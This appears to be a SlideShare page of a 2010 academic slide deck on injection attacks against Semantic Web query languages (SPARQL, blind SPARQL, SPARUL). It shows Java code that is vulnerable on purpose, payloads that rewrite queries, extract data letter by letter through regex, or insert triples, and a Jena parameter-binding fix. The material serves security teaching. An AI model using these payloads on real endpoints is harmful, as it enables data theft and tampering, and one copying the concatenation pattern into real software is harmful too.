Pablo Orduña, profile picture
Uploaded byPablo Orduña
PDF, PPTX598 views

Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages

The document discusses security issues related to injection attacks in semantic query languages like SPARQL. It introduces SPARQL injection by showing an example query that is vulnerable because it appends a user-provided name variable without sanitization. This allows the variable to contain malicious SPARQL code that can modify the query. The document also briefly mentions blind SPARQL injection and SPARUL injection as other issues.

Download as PDF, PPTX
Introduction Vulnerable code samples Addressing code injection Conclusions Addressing Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages Pablo Ordu˜a, Aitor Almeida, Unai Aguilera, Xabier Laiseca, n Diego L´pez-de-Ipi˜a, Aitor G´mez-Goiri o n o September 9th, 2010 Future Internet - Elkarlaneko ikerkuntza estrategikorako programa; ETORTEK 2008 img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Introduction The Semantic Web is based on a set of technologies: XML RDF OWL ... img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Query Languages New technologies have been developed to query the ontologies later later RDQL − − SPARQL − − SPARUL −→ −→ These new query languages are based on SQL RDQL and SPARQL → Read-only query languages introduces SPARUL (SPARQL/Update) − − − − modification − − −→ capabilities SPARQL Sample: 1 PREFIX injection: <http://www.morelab.deusto.es/ injection.owl#> 2 SELECT ?p1 3 WHERE { 4 ?p1 a injection:Person . 5 } img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Security issues The use of these new query languages introduce vulnerabilities already found in a bad use of query languages Attacks like SQL Injection, LDAP Injection or even XPath Injection are already well known Libraries provide tools to sanitize user input in these languages A proper usage of the query languages is required in order to face new techniques, including: (Blind) SPARQL Injection SPARUL Injection img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection Introducing SPARQL Injection The following query is assumed to retrieve the friends of a user whom fullName is provided by the variable name The ontology is available in http://www.morelab.deusto.es/injection.owl img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 " + 4 "WHERE {" + 5 " ?p1 a injection:Person . " + 6 " ?p2 a injection:Person . " + 7 " ?p1 injection:fullName ’" + name + "’ . " + 8 " ?p1 injection:isFriendOf ?p2 . " + 9 " ?p1 injection:fullName ?name1 . " + 10 " ?p2 injection:fullName ?name2 . " + 11 "}"; 12 Query query = QueryFactory.create(queryString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection Introducing SPARQL Injection This code can be exploited to retrieve any information in the ontology The problem is that the variable name has not been sanitized This variable can include SPARQL code, and thus modify the query itself A variable with malicious content can be found in the next slide img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Appending the Strings 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + name + "’ . " + 7 " ?p1 injection:isFriendOf ?p2 . " + 8 " ?p1 injection:fullName ?name1 . " + 9 " ?p2 injection:fullName ?name2 . " + 10 "}"; 11 String name = "Pablo Orduna’ . " + 12 "?b1 a injection:Building . " + 13 "?b1 injection:name ?name1 . " + 14 "} #"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Appending the Strings 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + "Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?name1 . " + 9 " } #" + "’ . " + 10 " ?p1 injection:isFriendOf ?p2 . " + 11 " ?p1 injection:fullName ?name1 . " + 12 " ?p2 injection:fullName ?name2 . " + 13 "}"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions The final query 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?name1 . " + 9 " } #" + /* From this point everything 10 is commented and thus ignored */ "’ . " + 11 " ?p1 injection:isFriendOf ?p2 . " + 12 " ?p1 injection:fullName ?name1 . " + 13 " ?p2 injection:fullName ?name2 . " + 14 "}"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection This code will return the name of the building instead of the name of a user It is possible to use the flexibility of SPARQL to perform other kind of queries retrieving any information in the ontology img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection Introducing Blind SPARQL Injection The previous sample was especially vulnerable since it returned a string It is possible to retrieve any information as a string Strings are usually not retrieved in SPARQL, but individuals What if the returning value is an individual? It’s still possible to retrieve any information If it’s possible to know if a given query is true or false, it’s possible to iteratively retrieve any information The following code retrieves the individuals themselves It’s possible to know if the query provided or not the individuals img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection 1 String queryString = 2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 3 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 4 "SELECT ?p1 ?p2 " + 5 "WHERE {" + 6 " ?p1 a injection:Person . " + 7 " ?p2 a injection:Person . " + 8 " ?p1 injection:fullName ’" + name + "’ˆˆxsd :string . " + 9 " ?p1 injection:isFriendOf ?p2 . " + 10 "}"; 11 Query query = QueryFactory.create(queryString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection Once again, the variable name has not been sanitized So it’s still possible to inject SPARQL code The injected code can’t return a building or the building name But, adding a condition like “does the building name start by this letter” we will get: The common results → so the building name starts by that letter No results → so the building name does not start by that letter img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection 1 String queryString = /* PREFIXES ... */ 2 "SELECT ?p1 ?p2 " + 3 "WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + name + "’ˆˆxsd :string . " + 7 " ?p1 injection:isFriendOf ?p2 . " + 8 "}"; 9 String name = "Pablo Orduna’ . " + 10 "?b1 a injection:Building . " + 11 "?b1 injection:name ?buildingName . " + 12 "FILTER regex(?buildingName, "ˆ" + s + ".*") . " + 13 "} #"; // }:-D img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions The final query would be. . . 1 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?p1 ?p2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?buildingName . " + 9 " FILTER regex(?buildingName, "ˆ" + s + ".*") . " + 10 " } #" + /* from here ignored*/ "’ˆˆxsd:string . " + 11 " ?p1 injection:isFriendOf ?p2 . }"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Querying recursively. . . 1 public static String recursively(String letters) throws Exception{ 2 for(int i = 0; i < POSSIBLE_LETTERS.length(); ++ i){ 3 char c = POSSIBLE_LETTERS.charAt(i); 4 if(tryBlind(letters + c)){ 5 System.out.println(c); 6 return "" + c + recursively(letters + c); 7 } 8 } 9 return ""; 10 } img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection It is possible to optimize this system using binary search Performing queries using Regular Expressions like ˆ[A-M].* to know if the char is between the char A and M Given a charset of length 64, we would reduce the number of iterations from 64 times 10 (640) to 6 times 10 (60) Using the whole UTF-16 charset, it would reduce the number of iterations from 65536 times 10 (655360) to 16 times 10 (160) The point is that it’s possible to retrieve any information in the ontology independently from the values returned by the query img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection Introducing SPARQL/Update Injection All the previous examples are executed in read-only query languages SPARUL introduces the chance to modify the ontology INSERT, MODIFY and DELETE statements are available The following sample modifies the fullName of the resource injection:Pablo, setting it to the value of the variable name img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection 1 String updateString = "PREFIX injection: <http:// www.morelab.deusto.es/injection.owl#> " + 2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 3 "DELETE {" + 4 " injection:Pablo injection:fullName ?name1 "+ 5 "} WHERE {" + 6 " injection:Pablo injection:fullName ?name1" + 7 "}n INSERT {" + 8 " injection:Pablo injection:fullName ’" + name + "’ˆˆxsd:string" + 9 "}"; 10 UpdateRequest update = UpdateFactory.create( updateString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection 1 String name = "Pablo Ordunya’ˆˆxsd:string" + 2 "} n " + 3 "INSERT {" + 4 " injection:Pablo injection:isFriendOf injection:EvilMonkey" + 5 "} #"; // }:-D 6 String result = sample.run(name); With this vulnerability, it is possible to modify the whole ontology. img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Vulnerable code samples Introduction Addressing code injection Conclusions Addressing code injection Mechanisms provided by the library must be used (if provided) Not as simple as scaping the ’ characters: the string u0027 is a simple quote, just as in Java 1 System.out.println("au0022.length() + u0022b".length()); 2 // This code prints "2", the result of ("a".length() + "b".length()) 3 // since u0022 will be replaced by " even if it is commented or inside 4 // String img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Vulnerable code samples Introduction Addressing code injection Conclusions Frameworks In Jena, the initialBinding argument can be used in the QueryExecutionFactory 1 // initial binding 2 QuerySolutionMap initialBinding = new QuerySolutionMap(); 3 RDFNode parameterizedName = model.createLiteral( name); 4 initialSetting.add("thename", parameterizedName); 5 6 // Perform the query 7 Query query = QueryFactory.create(queryString); 8 QueryExecution qe = QueryExecutionFactory.create( query, model, initialBinding); 9 ResultSet results = qe.execSelect(); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Vulnerable code samples Addressing code injection Conclusions Conclusions Not sanitizing the user input might add a set of security vulnerabilities in our systems In the paper it is presented how new query languages inherit security issues present in older query languages, and therefore they should also be taken into account when working with them img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Vulnerable code samples Addressing code injection Conclusions Questions? DeustoTech - Internet http://www.morelab.deusto.es Pablo Ordu˜an pablo.orduna@deusto.es Aitor Almeida aitor.almeida@deusto.es Unai Aguilera unai.aguilera@deusto.es Xabier Laiseca xabier.laiseca@deusto.es Diego L´pez-de-Ipi˜a o n dipina@deusto.es Aitor G´mez-Goiri o aitor.gomez@deusto.es img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .

More Related Content

PDF
Rr 7944
byfangjiafu
 
PDF
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-Automation
byAlex Senkevitch
 
PPTX
Research Overview
byavinashvarna
 
PDF
Application Security, in Six Parts (HackPra 2012)
byjohnwilander
 
PDF
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It Poses
byAlex Senkevitch
 
PDF
Designing Experiment Agnostic Remote Laboratories
byPablo Orduña
 
PDF
Taller Ria
byPablo Orduña
 
PPT
Mumbai Moods
byrajshah
 
Rr 7944
byfangjiafu
 
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-Automation
byAlex Senkevitch
 
Research Overview
byavinashvarna
 
Application Security, in Six Parts (HackPra 2012)
byjohnwilander
 
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It Poses
byAlex Senkevitch
 
Designing Experiment Agnostic Remote Laboratories
byPablo Orduña
 
Taller Ria
byPablo Orduña
 
Mumbai Moods
byrajshah
 

Viewers also liked

PDF
Taller Test Driven Development
byPablo Orduña
 
ODP
GWT 2 Is Smarter Than You
byRobert Cooper
 
PDF
WebLab-Deusto [TARET3]
byPablo Orduña
 
PDF
DeustoTech Talk: ACROSS project
byPablo Orduña
 
PDF
MVP mit dem Google Web Toolkit
byCenarion Information Systems GmbH
 
PDF
GWT – Google Web Toolkit in der Praxis
byCenarion Information Systems GmbH
 
Taller Test Driven Development
byPablo Orduña
 
GWT 2 Is Smarter Than You
byRobert Cooper
 
WebLab-Deusto [TARET3]
byPablo Orduña
 
DeustoTech Talk: ACROSS project
byPablo Orduña
 
MVP mit dem Google Web Toolkit
byCenarion Information Systems GmbH
 
GWT – Google Web Toolkit in der Praxis
byCenarion Information Systems GmbH
 

Similar to Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages

PDF
SPARQL/RDQL/SPARUL Injection
byMoreLab
 
PDF
Parse.ly: Inside a modern RIA built with Solr
byAndrew Montalenti
 
PDF
Semantic web services and its challenges
byiaemedu
 
PPTX
Web 3.0 & IoT (English)
byPeter Waher
 
PPTX
Web 3.0 & io t (en)
byRikard Strid
 
PDF
Sw 5semantic web-primer
byokeee
 
PDF
Really usefulebooks 0262012421_the mit press a semantic web primer 2nd editio...
byokeee
 
PDF
Semantic web-primer
byokeee
 
PDF
Defcon 20-zulla-improving-web-vulnerability-scanning
byzulla
 
PDF
Defcon 20-zulla-improving-web-vulnerability-scanning
byzulla
 
PDF
Context-Aware Access Control for RDF Graph Stores
bySerena Villata
 
PDF
Protecting Your APIs Against Attack & Hijack
byCA API Management
 
PDF
Suche mit Apache Lucene & Co.
byinovex GmbH
 
PDF
Webinar: Semantic web for developers
bySemantic Web Company
 
PPT
Pentest Application With GraphQL | Null Bangalore Meetup
byDivyanshu
 
PPTX
Answering Search Queries with CrowdSearcher: a crowdsourcing and social netwo...
byMarco Brambilla
 
PPT
Semantic Search overview at SSSW 2012
byPeter Mika
 
PDF
Web Security - Introduction
bySQALab
 
PDF
Web Security - Introduction v.1.3
byOles Seheda
 
PDF
DEF CON 27 - MICHAEL STEPANKIN - apache solr injection
byFelipe Prado
 
SPARQL/RDQL/SPARUL Injection
byMoreLab
 
Parse.ly: Inside a modern RIA built with Solr
byAndrew Montalenti
 
Semantic web services and its challenges
byiaemedu
 
Web 3.0 & IoT (English)
byPeter Waher
 
Web 3.0 & io t (en)
byRikard Strid
 
Sw 5semantic web-primer
byokeee
 
Really usefulebooks 0262012421_the mit press a semantic web primer 2nd editio...
byokeee
 
Semantic web-primer
byokeee
 
Defcon 20-zulla-improving-web-vulnerability-scanning
byzulla
 
Defcon 20-zulla-improving-web-vulnerability-scanning
byzulla
 
Context-Aware Access Control for RDF Graph Stores
bySerena Villata
 
Protecting Your APIs Against Attack & Hijack
byCA API Management
 
Suche mit Apache Lucene & Co.
byinovex GmbH
 
Webinar: Semantic web for developers
bySemantic Web Company
 
Pentest Application With GraphQL | Null Bangalore Meetup
byDivyanshu
 
Answering Search Queries with CrowdSearcher: a crowdsourcing and social netwo...
byMarco Brambilla
 
Semantic Search overview at SSSW 2012
byPeter Mika
 
Web Security - Introduction
bySQALab
 
Web Security - Introduction v.1.3
byOles Seheda
 
DEF CON 27 - MICHAEL STEPANKIN - apache solr injection
byFelipe Prado
 

Recently uploaded

PDF
Log-based anomaly detection using BiLSTM-Autoencoder
byMohammed BEKKOUCHE
 
PDF
MicroPython presentation - PyConFr Lyon 2025 - Amine Bendahmane
byAmine Bendahmane
 
PDF
ODSC West 2025 OpenMetadata Workshop.pdf
byOpenMetadata
 
PDF
UiPath Community Day UNI - Nuevos productos de UiPath.pdf
byfelixluen
 
PPTX
Softaken SQLite DB Converter for Seamless SQLite Database file Conversion on ...
byDemetrio Parrilla
 
PPTX
UiPath Data Fabric From Data Silos to Unified Flows.pptx
bysuhanisingh58689
 
PDF
2025 AI Adoption Report: Gen AI Fast-Tracks Into the Enterprise
byRazin Mustafiz
 
PDF
API Days Australia - API Management in the AI Era
byNilesh Gule
 
PDF
Immer vorne mit dabei sein - Roaming leicht gemacht
bypanagenda
 
PDF
solare-141229235048-conversion-gate01.pdf
bymartinhyacinthe3
 
PPTX
Assignment Review and Accessibility Audit Findings.pptx
byJulia Undeutsch
 
PPTX
2025 - AI terms & Meanings for Marketers
byashishav29
 
PDF
NPTEL Assignment Completed PDF FILE with ans
byadultme43
 
PDF
Integrare AI e Automazione con UiPath Agent Builder
byUiPathCommunity
 
PDF
Transcript: Embedding sustainability: Tips for ebook and print production - T...
byBookNet Canada
 
PDF
Fighting CVEs in Embedded Linux with the Yocto Project and OTA Updates
byLeon Anavi
 
PDF
Spec Driven Development with Kiro: Ensuring Quality and Traceability in the A...
byHaim Michael
 
PDF
n8n - Next Generation Workflow Automation with Open Source
byDaisuke Masuda
 
PDF
Embedding sustainability: Tips for ebook and print production - Tech Forum 2025
byBookNet Canada
 
PDF
AI Demands More: Help Ensure Network Readiness With ThousandEyes
byThousandEyes
 
Log-based anomaly detection using BiLSTM-Autoencoder
byMohammed BEKKOUCHE
 
MicroPython presentation - PyConFr Lyon 2025 - Amine Bendahmane
byAmine Bendahmane
 
ODSC West 2025 OpenMetadata Workshop.pdf
byOpenMetadata
 
UiPath Community Day UNI - Nuevos productos de UiPath.pdf
byfelixluen
 
Softaken SQLite DB Converter for Seamless SQLite Database file Conversion on ...
byDemetrio Parrilla
 
UiPath Data Fabric From Data Silos to Unified Flows.pptx
bysuhanisingh58689
 
2025 AI Adoption Report: Gen AI Fast-Tracks Into the Enterprise
byRazin Mustafiz
 
API Days Australia - API Management in the AI Era
byNilesh Gule
 
Immer vorne mit dabei sein - Roaming leicht gemacht
bypanagenda
 
solare-141229235048-conversion-gate01.pdf
bymartinhyacinthe3
 
Assignment Review and Accessibility Audit Findings.pptx
byJulia Undeutsch
 
2025 - AI terms & Meanings for Marketers
byashishav29
 
NPTEL Assignment Completed PDF FILE with ans
byadultme43
 
Integrare AI e Automazione con UiPath Agent Builder
byUiPathCommunity
 
Transcript: Embedding sustainability: Tips for ebook and print production - T...
byBookNet Canada
 
Fighting CVEs in Embedded Linux with the Yocto Project and OTA Updates
byLeon Anavi
 
Spec Driven Development with Kiro: Ensuring Quality and Traceability in the A...
byHaim Michael
 
n8n - Next Generation Workflow Automation with Open Source
byDaisuke Masuda
 
Embedding sustainability: Tips for ebook and print production - Tech Forum 2025
byBookNet Canada
 
AI Demands More: Help Ensure Network Readiness With ThousandEyes
byThousandEyes
 

Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages

  • 1.
    Introduction Vulnerable code samples Addressing code injection Conclusions Addressing Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages Pablo Ordu˜a, Aitor Almeida, Unai Aguilera, Xabier Laiseca, n Diego L´pez-de-Ipi˜a, Aitor G´mez-Goiri o n o September 9th, 2010 Future Internet - Elkarlaneko ikerkuntza estrategikorako programa; ETORTEK 2008 img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 2.
    Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Introduction The Semantic Web is based on a set of technologies: XML RDF OWL ... img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 3.
    Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Query Languages New technologies have been developed to query the ontologies later later RDQL − − SPARQL − − SPARUL −→ −→ These new query languages are based on SQL RDQL and SPARQL → Read-only query languages introduces SPARUL (SPARQL/Update) − − − − modification − − −→ capabilities SPARQL Sample: 1 PREFIX injection: <http://www.morelab.deusto.es/ injection.owl#> 2 SELECT ?p1 3 WHERE { 4 ?p1 a injection:Person . 5 } img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 4.
    Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Security issues The use of these new query languages introduce vulnerabilities already found in a bad use of query languages Attacks like SQL Injection, LDAP Injection or even XPath Injection are already well known Libraries provide tools to sanitize user input in these languages A proper usage of the query languages is required in order to face new techniques, including: (Blind) SPARQL Injection SPARUL Injection img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 5.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection Introducing SPARQL Injection The following query is assumed to retrieve the friends of a user whom fullName is provided by the variable name The ontology is available in http://www.morelab.deusto.es/injection.owl img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 6.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 " + 4 "WHERE {" + 5 " ?p1 a injection:Person . " + 6 " ?p2 a injection:Person . " + 7 " ?p1 injection:fullName ’" + name + "’ . " + 8 " ?p1 injection:isFriendOf ?p2 . " + 9 " ?p1 injection:fullName ?name1 . " + 10 " ?p2 injection:fullName ?name2 . " + 11 "}"; 12 Query query = QueryFactory.create(queryString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 7.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection Introducing SPARQL Injection This code can be exploited to retrieve any information in the ontology The problem is that the variable name has not been sanitized This variable can include SPARQL code, and thus modify the query itself A variable with malicious content can be found in the next slide img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 8.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Appending the Strings 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + name + "’ . " + 7 " ?p1 injection:isFriendOf ?p2 . " + 8 " ?p1 injection:fullName ?name1 . " + 9 " ?p2 injection:fullName ?name2 . " + 10 "}"; 11 String name = "Pablo Orduna’ . " + 12 "?b1 a injection:Building . " + 13 "?b1 injection:name ?name1 . " + 14 "} #"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 9.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Appending the Strings 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + "Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?name1 . " + 9 " } #" + "’ . " + 10 " ?p1 injection:isFriendOf ?p2 . " + 11 " ?p1 injection:fullName ?name1 . " + 12 " ?p2 injection:fullName ?name2 . " + 13 "}"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 10.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions The final query 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?name1 . " + 9 " } #" + /* From this point everything 10 is commented and thus ignored */ "’ . " + 11 " ?p1 injection:isFriendOf ?p2 . " + 12 " ?p1 injection:fullName ?name1 . " + 13 " ?p2 injection:fullName ?name2 . " + 14 "}"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 11.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection This code will return the name of the building instead of the name of a user It is possible to use the flexibility of SPARQL to perform other kind of queries retrieving any information in the ontology img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 12.
